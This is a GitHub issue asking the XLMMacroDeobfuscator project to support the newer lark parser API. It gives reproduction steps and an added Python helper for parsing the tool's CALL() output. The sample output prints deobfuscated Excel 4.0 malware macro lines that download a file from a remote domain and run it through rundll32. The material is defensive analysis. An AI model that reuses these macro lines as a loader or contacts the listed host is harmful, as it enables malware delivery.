DissectMalware / XLMMacroDeobfuscator

Extract and Deobfuscate XLM macros (a.k.a Excel 4.0 Macros)
Apache License 2.0

Old version/repository of lark used #118

Open xambroz opened 2 months ago

xambroz commented 2 months ago

Hello, please could you consider updating the API of the lark parser to the current API (1.0.0+)? The PyPI project lark-parser was renamed to lark a while ago and new updates go only to the lark repository.

Versions up to 0.12.0 work (both the old lark-parser and the new lark repository), but there was a significant API change in 1.0.0 which broke the API and requires a code change in xlmmacrodeobfuscator.

I have tried packaging XLMMacroDeobfuscator for Fedora, which worked until Fedora 38, when distributions were still using the old version of lark-parser, but it is now common for Linux distributions to have switched to the new API of lark 1.0.0+.

Fedora 38 - lark-parser 0.12.0
Fedora 39/40 - lark 1.1.7
Debian stable Bookworm - lark 1.1.5
Debian unstable Sid - lark 1.1.9
Ubuntu 22+ - lark 1.1.1+

===== This works: python 3.12 - lark<1.0.0

virtualenv --python=$(which python3.12) p3.12
p3.12/bin/pip install setuptools
p3.12/bin/pip install xlmmacrodeobfuscator
p3.12/bin/pip uninstall lark-parser -y
p3.12/bin/pip install 'lark<1.0.0'
p3.12/bin/xlmdeobfuscator -f ~/tmp/malware/edd554502033d78ac18e4bd917d023da2fd64843c823c1be8bc273f48a5f3f5f | grep -e "CALL"
...
CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\Users\Public\csg75ef.html",0,0)
CELL:R16       , FullEvaluation      , IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\Users\Public\bwep5ef.html",0,0),)
CELL:R18       , FullEvaluation      , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\csg75ef.html,DllRegisterServer",0,5)

===== This doesn't work: python 3.12 - lark>1.0.0

virtualenv --python=$(which python3.12) p3.12
p3.12/bin/pip install setuptools
p3.12/bin/pip install xlmmacrodeobfuscator
p3.12/bin/pip uninstall lark-parser -y
p3.12/bin/pip install 'lark>1.0.0'
p3.12/bin/xlmdeobfuscator -f ~/tmp/malware/edd554502033d78ac18e4bd917d023da2fd64843c823c1be8bc273f48a5f3f5f | grep -e "CALL"

XLMMacroDeobfuscator: pywin32 is not installed (only is required if you want to use MS Excel)

          _        _______
|\     /|( \      (       )
( \   / )| (      | () () |
 \ (_) / | |      | || || |
  ) _ (  | |      | |(_)| |
 / ( ) \ | |      | |   | |
( /   \ )| (____/\| )   ( |
|/     \|(_______/|/     \|
   ______   _______  _______  ______   _______           _______  _______  _______ _________ _______  _______
  (  __  \ (  ____ \(  ___  )(  ___ \ (  ____ \|\     /|(  ____ \(  ____ \(  ___  )\__   __/(  ___  )(  ____ )
  | (  \  )| (    \/| (   ) || (   ) )| (    \/| )   ( || (    \/| (    \/| (   ) |   ) (   | (   ) || (    )|
  | |   ) || (__    | |   | || (__/ / | (__    | |   | || (_____ | |      | (___) |   | |   | |   | || (____)|
  | |   | ||  __)   | |   | ||  __ (  |  __)   | |   | |(_____  )| |      |  ___  |   | |   | |   | ||     __)
  | |   ) || (      | |   | || (  \ \ | (      | |   | |      ) || |      | (   ) |   | |   | |   | || (\ (
  | (__/  )| (____/\| (___) || )___) )| )      | (___) |/\____) || (____/\| )   ( |   | |   | (___) || ) \ \__
  (______/ (_______/(_______)|/ \___/ |/       (_______)\_______)(_______/|/     \|   )_(   (_______)|/   \__/

....
XLMMacroDeobfuscator(v0.2.7) - https://github.com/DissectMalware/XLMMacroDeobfuscator

File: /home/testuser/tmp/malware/edd554502033d78ac18e4bd917d023da2fd64843c823c1be8bc273f48a5f3f5f

Unencrypted xls file

[Loading Cells]
auto_open: auto_open->'jMAhUST1Sf'!$Q$1
[Starting Deobfuscation]

Error [deobfuscator.py:2598 evaluation_result = self.evaluate_parse_tree(current_cell, parse_tree, interactive)]: 'None'
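The `grep -e "CALL"` filter in the working run above returns whole lines; for triage one usually wants the library, function and arguments of each CALL(), including the one nested inside IF() in cell R16. The following is an added example, not code from the report or from the XLMMacroDeobfuscator project: it parses the two output lines quoted above (copied into a string as the only input) and assumes nothing about the tool beyond that output format.

```python
import re

# Output lines from the working run above (copied from the report, not new data).
SAMPLE_OUTPUT = r"""
CELL:R16       , FullEvaluation      , IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\Users\Public\bwep5ef.html",0,0),)
CELL:R18       , FullEvaluation      , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\csg75ef.html,DllRegisterServer",0,5)
"""

CALL_RE = re.compile(r"\bCALL\(")


def _parse_args(text, start):
    """Parse the argument list opened by text[start] == '('; return (args, close_index).
    Commas split only at depth 0 and outside Excel string literals ("" escapes a quote)."""
    args, buf, depth, in_str, i = [], [], 0, False, start + 1
    while i < len(text):
        c = text[i]
        if in_str and c == '"' and text[i + 1:i + 2] == '"':
            buf.append('"')          # doubled quote inside a literal
            i += 1
        elif c == '"':
            in_str = not in_str      # enter or leave the literal; quotes are dropped
        elif in_str or c not in "(),":
            buf.append(c)
        elif c == "(":
            depth += 1
            buf.append(c)
        elif c == ")" and depth > 0:
            depth -= 1
            buf.append(c)
        elif c == ")":               # closing paren of this CALL()
            args.append("".join(buf).strip())
            return args, i
        else:                        # top-level comma separates arguments
            args.append("".join(buf).strip())
            buf = []
        i += 1
    raise ValueError("unterminated CALL( in: " + text)


def extract_calls(output):
    """Return every CALL() in xlmdeobfuscator output, including ones nested inside IF()."""
    calls = []
    for line in output.splitlines():
        cell = line[5:].split(",", 1)[0].strip() if line.startswith("CELL:") else None
        for m in CALL_RE.finditer(line):          # m.end() - 1 is the index of '('
            args, _ = _parse_args(line, m.end() - 1)
            calls.append({"cell": cell, "library": args[0], "function": args[1],
                          "type_string": args[2], "args": args[3:]})
    return calls
```

Note that the comma inside the last string argument of the R18 line (`...csg75ef.html,DllRegisterServer`) is kept as part of that argument, which a naive `split(",")` would break.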